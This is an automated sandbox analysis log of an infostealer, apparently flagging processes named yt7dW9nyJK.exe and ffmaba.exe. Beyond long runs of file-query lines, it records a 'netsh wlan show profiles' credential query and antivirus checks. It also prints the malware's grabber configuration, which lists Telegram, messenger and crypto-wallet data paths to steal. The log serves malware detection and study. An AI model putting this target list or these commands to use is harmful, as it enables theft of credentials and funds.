Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe

Code function: 25_2_6C092808 GetSystemTime,SystemTimeToFileTime,BIO_ctrl,

25_2_6C092808

Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe

Code function: 25_2_6C1BA406 DeregisterEventSource,GetVersion,

25_2_6C1BA406

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Uses netsh to modify the Windows network and firewall settings

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

AV process strings found (often used to terminate AV products)

Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005EB0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Yara match	File source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yt7dW9nyJK.exe PID: 2672, type: MEMORYSTR

Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: tor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: electroncash
Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 2iKqyuJTFpsXTtRw9pc8q8E38SzLcjAXXgfpuQw9044ON7ezDFP6911LpNxsu4gO2M2bDuH7YEkdMGBKv
